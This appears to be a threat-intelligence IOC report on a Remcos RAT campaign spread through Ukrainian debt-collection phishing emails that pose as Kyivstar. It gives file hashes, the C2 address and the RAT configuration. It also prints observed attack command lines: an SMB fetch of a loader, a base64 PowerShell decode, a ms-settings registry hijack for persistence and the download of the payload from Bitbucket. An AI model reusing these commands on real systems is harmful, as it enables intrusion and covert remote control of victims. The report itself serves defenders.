- #IOC #OptiData #VR #remcos #SMB #RAT #mic #keylog #scr
- https://pastebin.com/samYnJq6
- previous_contact:
- 30/11/23 https://pastebin.com/aG6XyqHN
- 13/11/23 https://pastebin.com/tbRpiGG5
- 06/02/23 https://pastebin.com/kjv5E8Au
- 12/07/21 https://pastebin.com/ZYZarB9L
- 15/07/19 https://pastebin.com/ZxG6eRWM
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
- attack_vector
- --------------
- email > att1 .zip > att2 + att3 .RAR > att4.RAR (pwd) > .doc (vba) > SMB \\89_23_98_22\LN\GB.exe > bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: Wed, 20 Dec 2023 22:39:50 -0800
- From: Лелюк Йоханес Вітанович <dj@benno.at>
- Subject: Заборгованість за договором Київстар – Передсудове
- Received: from mx20lb.world4you.com ([81.19.149.130])
- Received: from [94.131.102.115] (helo=98.159.36.138) by mx20lb.world4you.com with esmtpa (Exim 4.96.2)
- Reply-To: "info@kyivstar.net" <info@kyivstar.net>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a
- File name Заборгованість абонента.zip [ Zip archive data, at least v1.0 to extract ]
- File size 508.35 KB (520555 bytes)
- SHA-256 ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449
- File name Заборгованість абонента.part1.rar [ RAR archive data, v5 ]
- File size 350.00 KB (358400 bytes)
- SHA-256 9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba
- File name Заборгованість абонента.part2.rar [ RAR archive data, v5 ]
- File size 157.52 KB (161301 bytes)
- SHA-256 823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827
- File name Заборгованість абонента.rar [RAR archive data, v5] !PWD
- File size 506.79 KB (518958 bytes)
- SHA-256 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
- File name Заборгованість абонента.doc [ MS Word Document ] !VBA
- File size 672.00 KB (688128 bytes)
- SHA-256 d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c
- File name GB.exe [ PE32+ executable ] !Loader
- File size 262.50 KB (268800 bytes)
- SHA-256 7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c
- File name test2.exe [ PE32+ executable ] !Loader
- File size 172.00 KB (176128 bytes)
- SHA-256 6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d
- File name wsuscr.exe [ .NET executable ] !Payload - remcos
- File size 14.92 MB (15644672 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
- C2 45_87_155_41 : 8080
- netwrk
- --------------
- 89_23_98_22 445 SMB2 Tree Connect Request Tree: \\89_23_98_22\IPC$
- 89_23_98_22 445 SMB2 Create Request File: GB.exe
- 104_192_141_1 443 TLSv1 bitbucket_org Client Hello
- comp
- --------------
- System TCP 89_23_98_22 445 ESTABLISHED
- powershell.exe TCP 104_192_141_1 443 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n
- C:\Windows\SysWOW64\explorer.exe "\\89.23.98.22\LN\"
- \??\UNC\89.23.98.22\LN\GB.exe "\\89.23.98.22\LN\GB.exe"
- C:\Windows\system32\cmd.exe /c res.bat && test2.exe
- C:\Windows\system32\cmd.exe /S /D /c" echo f
- C:\Windows\system32\xcopy.exe xcopy /s test2.exe "C:\TEMP\persistent2\test2.exe"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String ...
- C:\Windows\system32\reg.exe add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
- C:\Windows\system32\reg.exe add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
- C:\Windows\system32\reg.exe delete HKCU\Software\Classes\.omg\ /f
- C:\Windows\system32\reg.exe delete HKCU\Software\Classes\ms-settings\ /f
- C:\Users\operator\AppData\Roaming\wsuscr.exe
- C:\ProgramData\wsus\wsus.exe
- C:\TEMP\IXP000.TMP\test2.exe
- C:\Windows\system32\cmd.exe /c "test2.bat"
- C:\Windows\system32\net.exe session
- C:\Windows\system32\net1.exe session
- persist
- --------------
- HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
- drop
- --------------
- %temp%\test2.exe
- %appdata%\wsuscr.exe
- ProgramData\wsus\wsus.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- malware_config
- {
- "Version": "4.9.3 Pro",
- "Host:Port:Password": "45_87_155_41 : 8080",
- "Assigned name": "wsus",
- "Connect interval": "1",
- "Install flag": "Enable",
- "Setup HKCU\\Run": "Enable",
- "Setup HKLM\\Run": "Enable",
- "Install path": "Application path",
- "Copy file": "wsus.exe",
- "Startup value": "Disable",
- "Hide file": "Disable",
- "Mutex": "dvwsus-SFNWWW",
- "Keylog flag": "0",
- "Keylog path": "Application path",
- "Keylog file": "logs.dat",
- "Keylog crypt": "Disable",
- "Hide keylog file": "Disable",
- "Screenshot flag": "Disable",
- "Screenshot time": "10",
- "Take Screenshot option": "Disable",
- "Take screenshot title": "",
- "Take screenshot time": "5",
- "Screenshot path": "AppData",
- "Screenshot file": "Screenshots",
- "Screenshot crypt": "Disable",
- "Mouse option": "Disable",
- "Delete file": "Disable",
- "Audio record time": "5"
- }
- other_files_from_SMB
- https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
- https://www.virustotal.com/gui/file/9cd6bd7e4391a92c402118c4d4541c65a9ae4996ad2c37384967e620f2452dca/details
- https://www.virustotal.com/gui/file/961b36bb78d27b3432fae08e5c4272fe295b5e24e832c6f6bf1ec3cf87057dab/details
- https://www.virustotal.com/gui/file/efa2f3a45664c73d2283d5acc094013466de47753b795193dd37f2e54a13b34a/details
- https://www.virustotal.com/gui/file/72d683597d351182d5ceaf884e2f028eddf3bf9a53fdb166024191720efc49ff/details
- https://www.virustotal.com/gui/file/800cd06e420db368d76de6067d887fb0a801ed31b787efbfde248ff28168eb54/details
- https://www.virustotal.com/gui/file/34318cdef0cad69ba0ba6f68b42fdd5c581abdbc4feceeab73bc13c56840e7fa/details
- https://www.virustotal.com/gui/file/10cef0b0f286a3f715aaad09fa089a97c10b98cf01cbae4c702eb49c7331f461/details
- https://www.virustotal.com/gui/file/ff0a84220d028052a841312cd81baa525d19f7e4b0ce94dbbaf6634a776d3814/details
- https://www.virustotal.com/gui/file/f58add586ed2fd30ffc10eff51f55f859eff1e7870743d46a5cfdc7b76a5e308/details
- https://www.virustotal.com/gui/file/07c6deac35b7070d7d9ded3fca62d976c054c1ad8e466a822543cee33ea04437/details
- https://www.virustotal.com/gui/file/15399042016065429443742d3638917dffec34e0ae6921d4b10ba9b5c2bf4353/details
- https://www.virustotal.com/gui/file/3c8861781bc5c16b4490863e238c5dc72fbe6586a1ee36df8989e7993a9c46b3/details
- https://www.virustotal.com/gui/file/24ab05b58fefbbaddf9d332076e9f9764a3610d7985be88dd6054d68ec991618/details
- https://www.virustotal.com/gui/file/6d8628ee670cea59d5314f18aacb449b858e9194a78d4256342999798b54ad13/details
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a/details
- https://www.virustotal.com/gui/file/ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449/details
- https://www.virustotal.com/gui/file/9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba/details
- https://www.virustotal.com/gui/file/823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827/details
- https://www.virustotal.com/gui/file/93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7/details
- https://analyze.intezer.com/analyses/268883ca-795e-449b-98aa-3166b2384fea/behavior
- https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
- https://analyze.intezer.com/analyses/113f3f5c-ddc5-4bb5-aa7b-e3d114b44a2b/behavior
- https://www.virustotal.com/gui/file/7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c/details
- https://www.virustotal.com/gui/file/6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d/details
- VR